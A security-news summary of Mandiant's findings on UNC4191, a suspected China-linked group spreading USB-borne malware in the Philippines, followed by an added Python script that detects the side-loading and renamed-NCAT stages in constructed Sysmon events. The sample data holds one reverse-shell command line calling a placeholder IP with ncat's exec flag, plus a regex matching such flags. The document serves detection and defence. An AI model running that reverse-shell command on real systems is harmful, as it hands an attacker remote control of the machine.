"China-Linked UNC4191 APT Relies on USB Devices in Attacks Against Entities in the Philippines"

Researchers at Mandiant discovered a suspected China-linked cyberespionage group, tracked as UNC4191, using Universal Serial Bus (USB) devices as the initial attack vector in campaigns targeting entities in the Philippines. The campaign has been active since September 2021 and has hit public and private sector organizations primarily in Southeast Asia, as well as organizations in the US, Europe, and APJ. Even when the targeted organizations were based elsewhere, the specific systems UNC4191 compromised were physically located in the Philippines. The attackers used legitimately signed binaries to side-load their malware, and Mandiant is tracking three new malware families in the operation: MISTCLOAK, DARKDEW, and BLUEHAZE. The infection chain starts when a user plugs in an infected removable drive and manually runs a renamed signed binary placed in the root directory of the storage volume. These initial binaries are versions of USB Network Gate, a legitimately signed application from the company Electronic Team, and they are abused to load MISTCLOAK, a launcher that masquerades as a legitimate Dynamic Link Library (DLL) sitting beside the executable. Once a system is infected, the malware launches a renamed NCAT binary to open a reverse shell, giving the actor a persistent foothold. The malicious code is wormable: it replicates itself onto any new removable drive plugged into a compromised system, so the payloads spread to further systems and may reach air-gapped networks. The threat actors have been observed enumerating domain trusts and querying domain and local group permissions within minutes of gaining access. This article continues to discuss the UNC4191 Advanced Persistent Threat (APT) group using USB devices in attacks against entities in the Philippines.
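The infection chain above leaves three telemetry signals a defender can hunt for: a signed executable run from the root of a removable volume under a name that does not match its version resource, an unsigned DLL loaded from that same directory (the side-load), and an NCAT binary running under another filename or with an exec flag (the reverse shell). The following script is an added example written for this summary; it is not code from Mandiant or Security Affairs. It runs three such checks over constructed Sysmon-style records (Event ID 1 for process creation, Event ID 7 for image load). Field names follow Sysmon's schema, but every value is made up, the caller supplies which drive letters are removable (Sysmon does not report drive type), and the OriginalFileName values `usbng.exe` and `ncat.exe` are assumptions standing in for whatever the real PE version resources contain.

```python
import ntpath
import re

# Constructed Sysmon-style sample telemetry (not real logs). Field names match
# Sysmon's schema; values, PIDs and addresses are invented for this example.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120,
     "Image": r"E:\Documents.exe",               # renamed binary at removable root
     "OriginalFileName": "usbng.exe",           # assumed version-resource name
     "CommandLine": r"E:\Documents.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 7, "ProcessId": 4120,
     "Image": r"E:\Documents.exe",
     "ImageLoaded": r"E:\u2ec.dll",             # DLL beside the EXE, unsigned
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "ProcessId": 4120,
     "Image": r"E:\Documents.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 1, "ProcessId": 5230,
     "Image": r"C:\ProgramData\svchost.exe",      # renamed NCAT
     "OriginalFileName": "ncat.exe",            # assumed version-resource name
     "CommandLine": r"C:\ProgramData\svchost.exe 203.0.113.10 443 -e cmd.exe",
     "ParentImage": r"E:\Documents.exe"},
    {"EventID": 1, "ProcessId": 6001,            # benign control record
     "Image": r"C:\Program Files\Git\bin\git.exe",
     "OriginalFileName": "git.exe",
     "CommandLine": "git status",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

def _split(path):
    """Return (directory, filename), lower-cased, using Windows path rules."""
    d, n = ntpath.split(path)
    return d.lower(), n.lower()

def _is_volume_root(directory, letters):
    """True for a directory like 'e:\\' whose letter is in the removable set."""
    return len(directory) == 3 and directory[1:] == ":\\" and directory[0] in letters

def detect_renamed_binary_at_root(events, removable):
    """Process created from the root of a removable volume whose on-disk name
    differs from the OriginalFileName recorded in its PE version resource."""
    letters = {l.lower() for l in removable}
    hits = []
    for e in events:
        if e.get("EventID") != 1:
            continue
        d, name = _split(e["Image"])
        orig = e.get("OriginalFileName", "").lower()
        if _is_volume_root(d, letters) and orig and name != orig:
            hits.append((e["ProcessId"], e["Image"], e["OriginalFileName"]))
    return hits

def detect_sideload(events, removable):
    """Unsigned DLL loaded from the same removable-root directory as the EXE."""
    letters = {l.lower() for l in removable}
    hits = []
    for e in events:
        if e.get("EventID") != 7 or e.get("Signed", "").lower() != "false":
            continue
        exe_dir, _ = _split(e["Image"])
        dll_dir, dll = _split(e["ImageLoaded"])
        if dll.endswith(".dll") and dll_dir == exe_dir and _is_volume_root(exe_dir, letters):
            hits.append((e["ProcessId"], e["ImageLoaded"]))
    return hits

# Ncat flags that hand a shell to the remote peer: -e/--exec, -c/--sh-exec.
NCAT_EXEC_FLAGS = re.compile(r"(?:^|\s)(?:-e|--exec|-c|--sh-exec)\s")

def detect_renamed_ncat(events):
    """Ncat (by version-resource name) running under another filename and/or
    with an exec flag, i.e. the renamed NCAT reverse shell."""
    hits = []
    for e in events:
        if e.get("EventID") != 1 or e.get("OriginalFileName", "").lower() != "ncat.exe":
            continue
        _, name = _split(e["Image"])
        renamed = name != "ncat.exe"
        exec_flag = bool(NCAT_EXEC_FLAGS.search(e.get("CommandLine", "")))
        if renamed or exec_flag:
            hits.append((e["ProcessId"], e["Image"], renamed, exec_flag))
    return hits

def run_all(events, removable=("E",)):
    """Run every check and return the alerts keyed by detection name."""
    return {
        "renamed_binary_at_root": detect_renamed_binary_at_root(events, removable),
        "sideloaded_dll": detect_sideload(events, removable),
        "renamed_ncat": detect_renamed_ncat(events),
    }

if __name__ == "__main__":
    for name, hits in run_all(SAMPLE_EVENTS).items():
        print(name, hits)
```

The three checks are deliberately independent so that each one still fires when the others do not: the side-load check needs Sysmon image-load logging (Event ID 7) with signature data, while the other two work from process-creation events alone. Correlating the three on a shared ProcessId, as the sample does for PID 4120, is what turns a noisy single hit into a confident detection of this chain.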

Security Affairs reports "China-Linked UNC4191 APT Relies on USB Devices in Attacks Against Entities in the Philippines"

Submitted by Anonymous on